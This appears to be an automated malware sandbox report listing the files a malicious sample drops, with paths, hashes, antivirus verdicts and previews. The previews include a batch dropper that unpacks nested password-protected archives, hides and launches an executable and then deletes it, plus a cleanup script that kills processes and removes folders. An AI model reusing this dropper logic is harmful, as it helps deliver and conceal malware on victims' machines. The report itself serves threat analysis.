                                                                                                                                                                                                                                                            Preview:MIIDUDCCAjigAwIBAgIQImsjBGfFTk6M7sZzNVcAwDANBgkqhkiG9w0BAQsFADAlMSMwIQYDVQQDExphdXRoLmluc3RhbGxlcnNlcnZpY2VzLmNvbTAeFw0yMzEwMjUyMzEzNDhaFw0yODEwMjUyMzIzNDhaMCUxIzAhBgNVBAMTGmF1dGguaW5zdGFsbGVyc2VydmljZXMuY29tMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwnTHlqfx0MmiBSvhwkjmo2Y53B2ED6kyYgNgsSoX090DwL9g08Q2LnfEEFH+mif1Zv6jztT5QvWXjjroucDJQzZFBz/xbd1zilX80JFxD/8TIiKdmg73eXcrkSTsQUz97HwnpZbQDWbQJh/QxbvRIrJrcU2ADGsC5KBpRVXJ3t9m3TKNrfbAtKpPonso6+6GHvwUNTZUU9UgvDV3qGpDSniqumK3a1U9hphJJBb8us3o3538CM3tJAJ2w/bDGA/MOaTInkspZIQpecv16wkMWuLyHUxAaMDIO0tuIKxeIka0PaTAaZdw6BXofnNqwDD5JloOGm323JAR3pe+hJmSmQIDAQABo3wwejAOBgNVHQ8BAf8EBAMCBaAwCQYDVR0TBAIwADAdBgNVHSUEFjAUBggrBgEFBQcDAQYIKwYBBQUHAwIwHwYDVR0jBBgwFoAUL8Xv6MyxPZ8/T+cj4fEkfSpVzqEwHQYDVR0OBBYEFC/F7+jMsT2fP0/nI+HxJH0qVc6hMA0GCSqGSIb3DQEBCwUAA4IBAQASgm1VIK9vC88LPaCv7qPEd2TUtRrOi/VG2HkcpmBIKGoDeFa41jzKpO25iMg4MQhlXuljIYMDch8YpZETcFvBXHzfCF7Rc+kl/K5tFd8kHGMItiPuwZV/BfvL9Wu4gY4g1skfRpiemP1gZvlc1fZlEoYDqAIzODkRyXOd2nsa7zt8iGTdNujZ8A/IyQzGNeqtmt+bpNvKojkB
                                                                                                                                                                                                                                                            Process:C:\agfznulwo\fb22de53cd93474896e72899203b572f.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1136), with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1136
                                                                                                                                                                                                                                                            Entropy (8bit):5.884313058724772
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:QmeWUJxBiiAFaUlbJ2Hr1mI+Ic2iFerfnmj6BmKHnsZu:ZeX/ZkXgHr1m52iwrPvQInsZu
                                                                                                                                                                                                                                                            MD5:A10F31FA140F2608FF150125F3687920
                                                                                                                                                                                                                                                            SHA1:EC411CC7005AAA8E3775CF105FCD4E1239F8ED4B
                                                                                                                                                                                                                                                            SHA-256:28C871238311D40287C51DC09AEE6510CAC5306329981777071600B1112286C6
                                                                                                                                                                                                                                                            SHA-512:CF915FB34CD5ECFBD6B25171D6E0D3D09AF2597EDF29F9F24FA474685D4C5EC9BC742ADE9F29ABAC457DD645EE955B1914A635C90AF77C519D2ADA895E7ECF12
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MIIDUDCCAjigAwIBAgIQImsjBGfFTk6M7sZzNVcAwDANBgkqhkiG9w0BAQsFADAlMSMwIQYDVQQDExphdXRoLmluc3RhbGxlcnNlcnZpY2VzLmNvbTAeFw0yMzEwMjUyMzEzNDhaFw0yODEwMjUyMzIzNDhaMCUxIzAhBgNVBAMTGmF1dGguaW5zdGFsbGVyc2VydmljZXMuY29tMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwnTHlqfx0MmiBSvhwkjmo2Y53B2ED6kyYgNgsSoX090DwL9g08Q2LnfEEFH+mif1Zv6jztT5QvWXjjroucDJQzZFBz/xbd1zilX80JFxD/8TIiKdmg73eXcrkSTsQUz97HwnpZbQDWbQJh/QxbvRIrJrcU2ADGsC5KBpRVXJ3t9m3TKNrfbAtKpPonso6+6GHvwUNTZUU9UgvDV3qGpDSniqumK3a1U9hphJJBb8us3o3538CM3tJAJ2w/bDGA/MOaTInkspZIQpecv16wkMWuLyHUxAaMDIO0tuIKxeIka0PaTAaZdw6BXofnNqwDD5JloOGm323JAR3pe+hJmSmQIDAQABo3wwejAOBgNVHQ8BAf8EBAMCBaAwCQYDVR0TBAIwADAdBgNVHSUEFjAUBggrBgEFBQcDAQYIKwYBBQUHAwIwHwYDVR0jBBgwFoAUL8Xv6MyxPZ8/T+cj4fEkfSpVzqEwHQYDVR0OBBYEFC/F7+jMsT2fP0/nI+HxJH0qVc6hMA0GCSqGSIb3DQEBCwUAA4IBAQASgm1VIK9vC88LPaCv7qPEd2TUtRrOi/VG2HkcpmBIKGoDeFa41jzKpO25iMg4MQhlXuljIYMDch8YpZETcFvBXHzfCF7Rc+kl/K5tFd8kHGMItiPuwZV/BfvL9Wu4gY4g1skfRpiemP1gZvlc1fZlEoYDqAIzODkRyXOd2nsa7zt8iGTdNujZ8A/IyQzGNeqtmt+bpNvKojkB
                                                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):3272704
                                                                                                                                                                                                                                                            Entropy (8bit):6.634808752309927
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:49152:iIUtVtTZ0pIj3/bL4zoK79ucME+bkhG+WA73nilkwo:iIkVtTZ0pIj3vK79ucL+b9A73R
                                                                                                                                                                                                                                                            MD5:AEFBD9E285960B704524B4C33B0C9567
                                                                                                                                                                                                                                                            SHA1:688EB719525B89F93DB7D22BCBAE38A13E7A973B
                                                                                                                                                                                                                                                            SHA-256:BC240F565F4A4AAB03CDF04B6AE4522179347145E338EF33DF918E741AFC5EBB
                                                                                                                                                                                                                                                            SHA-512:9186CA00F1451B750F59BC999E696964866639A06018E4AD241DD5DDF85550FFDD370D91E72F45A04644F555C150021383E16B29F7C0C27CB8B7CF9465E0AD8F
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 53%
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@.......................... 2.......2...@.................................W...k.............................1...............................1..................................................... . ............................@....rsrc...............................@....idata ............................@...scoprlns.0+......0+.................@...mrzrmbbr......1.......1.............@....taggant.0....1.."....1.............@...........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                                                            Size (bytes):26
                                                                                                                                                                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1019674001\fdd59fd4bc.exe
                                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1679360
                                                                                                                                                                                                                                                            Entropy (8bit):6.278252955513617
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24576:S+clx4tCQJSVAFja8i/RwQQmzgO67V3bYgR+zypEqxr2VSlLP:jclmJSVARa86xzW3xRoyqqxrT
                                                                                                                                                                                                                                                            MD5:72491C7B87A7C2DD350B727444F13BB4
                                                                                                                                                                                                                                                            SHA1:1E9338D56DB7DED386878EAB7BB44B8934AB1BC7
                                                                                                                                                                                                                                                            SHA-256:34AD9BB80FE8BF28171E671228EB5B64A55CAA388C31CB8C0DF77C0136735891
                                                                                                                                                                                                                                                            SHA-512:583D0859D29145DFC48287C5A1B459E5DB4E939624BD549FF02C61EAE8A0F31FC96A509F3E146200CDD4C93B154123E5ADFBFE01F7D172DB33968155189B5511
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w...$...$...$.&.$...$.&.$...$...$...$.&.$%..$.&.$..$.&G$...$.&.$...$.&.$...$.&.$...$Rich...$........................PE..d.....n\.........." .........H...............................................P............`.............................................y...l...x........{...p.......................................................................................................text............................... ..`.rdata..9...........................@..@.data...............................@....pdata.......p... ..................@..@.rsrc....{.......|..................@..@.reloc...0.......2...n..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1019674001\fdd59fd4bc.exe
                                                                                                                                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):468992
                                                                                                                                                                                                                                                            Entropy (8bit):6.157743912672224
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6144:fz1gL5pRTMTTjMkId/BynSx7dEe6XwzRaktNP08NhKs39zo43fTtl1fayCV7+DHV:r1gL5pRTcAkS/3hzN8qE43fm78V
                                                                                                                                                                                                                                                            MD5:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                                            SHA1:6C7EA8BBD435163AE3945CBEF30EF6B9872A4591
                                                                                                                                                                                                                                                            SHA-256:344F076BB1211CB02ECA9E5ED2C0CE59BCF74CCBC749EC611538FA14ECB9AAD2
                                                                                                                                                                                                                                                            SHA-512:2C7293C084D09BC2E3AE2D066DD7B331C810D9E2EECA8B236A8E87FDEB18E877B948747D3491FCAFF245816507685250BD35F984C67A43B29B0AE31ECB2BD628
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........(...{...{...{...{...{...{...{...{...{...{...{...{...{..!{...{...{...{...{...{Rich...{................PE..d.....n\.........."..........l...... .........@...........................................`.....................................................x....`..........,a...........p.......................................................... ............................text............................... ..`.rdata..............................@..@.data....,..........................@....pdata..,a.......b..................@..@.rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1019674001\fdd59fd4bc.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):222
                                                                                                                                                                                                                                                            Entropy (8bit):4.855194602218789
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6:vFuj9HUHOPLtInnIgvRY77flFjfA+qpxuArS3+xTfVk3:duj9HeONgvRYnlfYFrSMTtk3
                                                                                                                                                                                                                                                            MD5:68CECDF24AA2FD011ECE466F00EF8450
                                                                                                                                                                                                                                                            SHA1:2F859046187E0D5286D0566FAC590B1836F6E1B7
                                                                                                                                                                                                                                                            SHA-256:64929489DC8A0D66EA95113D4E676368EDB576EA85D23564D53346B21C202770
                                                                                                                                                                                                                                                            SHA-512:471305140CF67ABAEC6927058853EF43C97BDCA763398263FB7932550D72D69B2A9668B286DF80B6B28E9DD1CBA1C44AAA436931F42CC57766EFF280FDB5477C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:Cd /d %1..Rd "%SfxVarApiPath%"..For /f "Tokens=1,2 Delims=," %%I In ('TaskList /fo CSV /nh') Do (.. If %%I==%2 (.. Set /a N+=1.. Set PID=%%~J.. )..)..If %N% EQU 1 Rd /s /q %1..If %N% GTR 1 TaskKill /pid %PID% /t /f
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1019674001\fdd59fd4bc.exe
                                                                                                                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):3473725
                                                                                                                                                                                                                                                            Entropy (8bit):7.999948676888215
                                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                                            SSDEEP:49152:9b8s3/pc44zfeVeY45ZADJE7ZdXrYX+RyWGGdVPLv7+joMMPlHxNwNrRPXD3tI:LP0eQz5Zwm7ZdEOhdLrK0l2FpI
                                                                                                                                                                                                                                                            MD5:045B0A3D5BE6F10DDF19AE6D92DFDD70
                                                                                                                                                                                                                                                            SHA1:0387715B6681D7097D372CD0005B664F76C933C7
                                                                                                                                                                                                                                                            SHA-256:94B392E94FA47D1B9B7AE6A29527727268CC2E3484E818C23608F8835BC1104D
                                                                                                                                                                                                                                                            SHA-512:58255A755531791B888FFD9B663CC678C63D5CAA932260E9546B1B10A8D54208334725C14529116B067BCF5A5E02DA85E015A3BED80092B7698A43DAB0168C7B
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:PK........n..Yd=,..5...5.....file_7.zipm..+]..E....`...._..'.....DXW|._6.Kau^.O....W.0.....fE....Q:.t`9.9"..c.... .[(2..[m{.`S.?8...w.v.{zo/a....E..L.1..<.....].@.....:...3?. k.5....H.=......0.A.,3p......_R.......[.7....j.Ba$v1AO.@q....x...u..9.k..z.p...5.....-(.b...y.........S.../..l.Q.....)....w..@...w;.;2.&Q.w.....Hn.3A.z.i..0i%A..E-7.....8....(.Z.A....k.......=.g.,......N.Yt`....)....T.....f..P.....u4ig.......B...~-7...Y]Ct.6.7..PS.Su7yx8...#.......B.3.f."....x.-u.....M.%.a.._\D.5.G....O.P....,b.;=.k[....4......SdS....gL.....X.......G...f.P....p.PS.~.P.}...X.7.+Ap.-.....^'..\.6..r.2.p.wd...dd....(..S..N..#.M....~..L..sjX...,..B.........-..R..~..A..B...MF..,.z.........lK.]<"..,...K.~..S.Z...p).......z..I..E.MG.M].....F.SY.p..1...sM7...B...l......g..V...q..p}$%iM....L...N...;.......}/Y8..&zAO&0..s.{.pR.A...Y`..Q.../n..,........z.&.k.`TU...7lv.xQ@~.'..H.S..y...n48......m....s1(.`.....,.n;j...CX.s..sN.L..q.u.G.....q.M..:..xI":Y.
                                                                                                                                                                                                                                                            Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):3473725
                                                                                                                                                                                                                                                            Entropy (8bit):7.999948676888215
                                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                                            SSDEEP:49152:9b8s3/pc44zfeVeY45ZADJE7ZdXrYX+RyWGGdVPLv7+joMMPlHxNwNrRPXD3tI:LP0eQz5Zwm7ZdEOhdLrK0l2FpI
                                                                                                                                                                                                                                                            MD5:045B0A3D5BE6F10DDF19AE6D92DFDD70
                                                                                                                                                                                                                                                            SHA1:0387715B6681D7097D372CD0005B664F76C933C7
                                                                                                                                                                                                                                                            SHA-256:94B392E94FA47D1B9B7AE6A29527727268CC2E3484E818C23608F8835BC1104D
                                                                                                                                                                                                                                                            SHA-512:58255A755531791B888FFD9B663CC678C63D5CAA932260E9546B1B10A8D54208334725C14529116B067BCF5A5E02DA85E015A3BED80092B7698A43DAB0168C7B
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:PK........n..Yd=,..5...5.....file_7.zipm..+]..E....`...._..'.....DXW|._6.Kau^.O....W.0.....fE....Q:.t`9.9"..c.... .[(2..[m{.`S.?8...w.v.{zo/a....E..L.1..<.....].@.....:...3?. k.5....H.=......0.A.,3p......_R.......[.7....j.Ba$v1AO.@q....x...u..9.k..z.p...5.....-(.b...y.........S.../..l.Q.....)....w..@...w;.;2.&Q.w.....Hn.3A.z.i..0i%A..E-7.....8....(.Z.A....k.......=.g.,......N.Yt`....)....T.....f..P.....u4ig.......B...~-7...Y]Ct.6.7..PS.Su7yx8...#.......B.3.f."....x.-u.....M.%.a.._\D.5.G....O.P....,b.;=.k[....4......SdS....gL.....X.......G...f.P....p.PS.~.P.}...X.7.+Ap.-.....^'..\.6..r.2.p.wd...dd....(..S..N..#.M....~..L..sjX...,..B.........-..R..~..A..B...MF..,.z.........lK.]<"..,...K.~..S.Z...p).......z..I..E.MG.M].....F.SY.p..1...sM7...B...l......g..V...q..p}$%iM....L...N...;.......}/Y8..&zAO&0..s.{.pR.A...Y`..Q.../n..,........z.&.k.`TU...7lv.xQ@~.'..H.S..y...n48......m....s1(.`.....,.n;j...CX.s..sN.L..q.u.G.....q.M..:..xI":Y.
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1019674001\fdd59fd4bc.exe
                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):440
                                                                                                                                                                                                                                                            Entropy (8bit):5.0791308599041844
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:QUp+CF16g64CTFMj2LIQLvDHW7PCVGrMLvmuCogLKO8NerxVv:QUpNF16g632CkezWDCVGYTOLv8k7
                                                                                                                                                                                                                                                            MD5:3626532127E3066DF98E34C3D56A1869
                                                                                                                                                                                                                                                            SHA1:5FA7102F02615AFDE4EFD4ED091744E842C63F78
                                                                                                                                                                                                                                                            SHA-256:2A0E18EF585DB0802269B8C1DDCCB95CE4C0BAC747E207EE6131DEE989788BCA
                                                                                                                                                                                                                                                            SHA-512:DCCE66D6E24D5A4A352874144871CD73C327E04C1B50764399457D8D70A9515F5BC0A650232763BF34D4830BAB70EE4539646E7625CFE5336A870E311043B2BD
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:..&cls..@echo off..mode 65,10..title g3g34g34g34g43 (34g34g45h6hj56j56j)..md extracted..ren file.bin file.zip..call 7z.exe e file.zip -p24291711423417250691697322505 -oextracted ..for /l %%i in (7,-1,1) do (..call 7z.exe e extracted/file_%%i.zip -oextracted..)..ren file.zip file.bin..cd extracted..move "in.exe" ../..cd....rd /s /q extracted..attrib +H "in.exe"..start "" "in.exe"..cls..echo Launched 'in.exe'...pause..del /f /q "in.exe"..
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
